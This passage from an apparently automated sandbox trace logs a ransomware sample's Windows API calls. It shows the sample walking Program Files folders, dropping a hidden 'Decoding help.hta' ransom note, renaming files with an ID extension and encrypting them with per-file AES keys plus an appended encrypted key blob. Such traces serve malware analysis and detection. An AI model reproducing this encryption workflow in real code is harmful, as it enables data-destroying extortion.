lstrlenW (lpString="treaty_olive.exe") returned 16 [0039.954] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0039.954] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned 47 [0039.954] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\", lpString2="treaty_olive.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe" [0039.954] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe" [0039.954] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe" (normalized: "c:\\program files (x86)\\windows defender\\treaty_olive.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows defender\\treaty_olive.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows defender\\treaty_olive.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0039.954] CreateFileMappingA (hFile=0x190, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x238 [0039.954] CryptAcquireContextA (in: phProv=0xa3cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa3cfcec*=0x5b0220) returned 1 [0039.955] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0xa3cfce8 | out: phKey=0xa3cfce8*=0x5a5830) returned 1 [0039.955] CryptExportKey (in: hKey=0x5a5830, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa3cfbe4, pdwDataLen=0xa3cfce4 | out: pbData=0xa3cfbe4*, pdwDataLen=0xa3cfce4*=0x2c) returned 1 [0039.955] MapViewOfFile (hFileMappingObject=0x238, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x9ed0000 [0039.957] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa3cfbe4*, pdwDataLen=0xa3cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa3cfbe4*, pdwDataLen=0xa3cfcf8*=0x100) returned 1 [0039.958] CryptEncrypt (in: hKey=0x5a5830, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x9ed0000, pdwDataLen=0xa3cfce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x9ed0000*, pdwDataLen=0xa3cfce4*=0x12800) returned 1 [0039.959] UnmapViewOfFile (lpBaseAddress=0x9ed0000) returned 1 [0039.960] CloseHandle (hObject=0x238) returned 1 [0039.960] CryptDestroyKey (hKey=0x5a5830) returned 1 [0039.960] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.960] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.960] WriteFile (in: hFile=0x190, lpBuffer=0xa3cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xa3cfcf8, lpOverlapped=0x0 | out: lpBuffer=0xa3cfbe4*, lpNumberOfBytesWritten=0xa3cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.961] WriteFile (in: hFile=0x190, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa3cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xa3cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.961] CloseHandle (hObject=0x190) returned 1 [0039.962] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\treaty_olive.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.962] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978373c0, ftCreationTime.dwHighDateTime=0x1d4becb, ftLastAccessTime.dwLowDateTime=0x6421bf90, ftLastAccessTime.dwHighDateTime=0x1d4d56a, ftLastWriteTime.dwLowDateTime=0x6421bf90, ftLastWriteTime.dwHighDateTime=0x1d4d56a, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="treaty_olive.exe", cAlternateFileName="TREATY~1.EXE")) returned 0 [0039.963] FindClose (in: hFindFile=0x5a5770 | out: hFindFile=0x5a5770) returned 1 Thread: id = 103 os_tid = 0xbd0 [0039.827] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*", lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a57b0 [0039.827] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.827] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.909] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.909] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.909] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72db7d50, ftCreationTime.dwHighDateTime=0x1d49e01, ftLastAccessTime.dwLowDateTime=0xc2a31f0, ftLastAccessTime.dwHighDateTime=0x1d52416, ftLastWriteTime.dwLowDateTime=0xc2a31f0, ftLastWriteTime.dwHighDateTime=0x1d52416, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="diy.exe", cAlternateFileName="")) returned 1 [0039.909] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.909] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.909] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" [0039.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\decoding help.hta")) returned 0xffffffff [0039.910] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0039.910] WriteFile (in: hFile=0x190, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa50fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa50fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.911] CloseHandle (hObject=0x190) returned 1 [0039.911] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.911] lstrcmpiW (lpString1="Decoding help.hta", lpString2="diy.exe") returned -1 [0039.911] lstrlenW (lpString="diy.exe") returned 7 [0039.911] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.911] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.911] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="diy.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe" [0039.911] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe" [0039.911] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe" (normalized: "c:\\program files (x86)\\windows mail\\diy.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\diy.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.912] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\diy.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0039.912] CreateFileMappingA (hFile=0x190, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x23c [0039.912] CryptAcquireContextA (in: phProv=0xa50fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa50fcec*=0x5e8130) returned 1 [0039.913] CryptGenKey (in: hProv=0x5e8130, Algid=0x6610, dwFlags=0x1, phKey=0xa50fce8 | out: phKey=0xa50fce8*=0x5a52f0) returned 1 [0039.913] CryptExportKey (in: hKey=0x5a52f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa50fbe4, pdwDataLen=0xa50fce4 | out: pbData=0xa50fbe4*, pdwDataLen=0xa50fce4*=0x2c) returned 1 [0039.913] MapViewOfFile (hFileMappingObject=0x23c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0xa650000 [0039.915] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa50fbe4*, pdwDataLen=0xa50fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa50fbe4*, pdwDataLen=0xa50fcf8*=0x100) returned 1 [0039.915] CryptEncrypt (in: hKey=0x5a52f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xa650000, pdwDataLen=0xa50fce4*=0x12800, dwBufLen=0x12800 | out: pbData=0xa650000*, pdwDataLen=0xa50fce4*=0x12800) returned 1 [0039.917] UnmapViewOfFile (lpBaseAddress=0xa650000) returned 1 [0039.918] CloseHandle (hObject=0x23c) returned 1 [0039.918] CryptDestroyKey (hKey=0x5a52f0) returned 1 [0039.918] CryptReleaseContext (hProv=0x5e8130, dwFlags=0x0) returned 1 [0039.918] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.918] WriteFile (in: hFile=0x190, lpBuffer=0xa50fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xa50fcf8, lpOverlapped=0x0 | out: lpBuffer=0xa50fbe4*, lpNumberOfBytesWritten=0xa50fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.919] WriteFile (in: hFile=0x190, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa50fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xa50fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.919] CloseHandle (hObject=0x190) returned 1 [0039.920] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\diy.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.921] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.921] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.921] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.921] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.921] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.921] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.921] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US" [0039.921] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*" [0039.921] GlobalMemoryStatus (in: lpBuffer=0xa50fd10 | out: lpBuffer=0xa50fd10) [0039.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93d0388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x190 [0039.951] CloseHandle (hObject=0x190) returned 1 [0039.951] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3b530d7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3b530d7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3b9f397, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoe.dll", cAlternateFileName="")) returned 1 [0039.951] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.951] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.951] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" [0039.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\decoding help.hta")) returned 0x1 [0039.951] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msoe.dll") returned -1 [0039.951] lstrlenW (lpString="msoe.dll") returned 8 [0039.951] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.951] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.951] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="msoe.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll" [0039.951] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll" [0039.952] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll" (normalized: "c:\\program files (x86)\\windows mail\\msoe.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\msoe.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\msoe.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.967] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e00b0b6, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x9e00b0b6, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x6cf87540, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2b4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOERES.dll", cAlternateFileName="")) returned 1 [0039.967] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.967] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.967] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" [0039.967] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\decoding help.hta")) returned 0x1 [0039.967] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSOERES.dll") returned -1 [0039.967] lstrlenW (lpString="MSOERES.dll") returned 11 [0039.967] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.967] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.967] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="MSOERES.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll" [0039.967] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll" [0039.967] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll" (normalized: "c:\\program files (x86)\\windows mail\\msoeres.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\msoeres.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.967] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3b9f397, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3b9f397, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3b9f397, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="oeimport.dll", cAlternateFileName="")) returned 1 [0039.967] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.967] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.967] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" [0039.967] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\decoding help.hta")) returned 0x1 [0039.967] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oeimport.dll") returned -1 [0039.967] lstrlenW (lpString="oeimport.dll") returned 12 [0039.967] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.968] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.968] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="oeimport.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll" [0039.968] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll" [0039.968] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll" (normalized: "c:\\program files (x86)\\windows mail\\oeimport.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\oeimport.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.968] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x879b1223, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x879b1223, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x87a95a65, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab.exe", cAlternateFileName="")) returned 1 [0039.968] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.968] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.968] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" [0039.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\decoding help.hta")) returned 0x1 [0039.968] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wab.exe") returned -1 [0039.968] lstrlenW (lpString="wab.exe") returned 7 [0039.968] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files 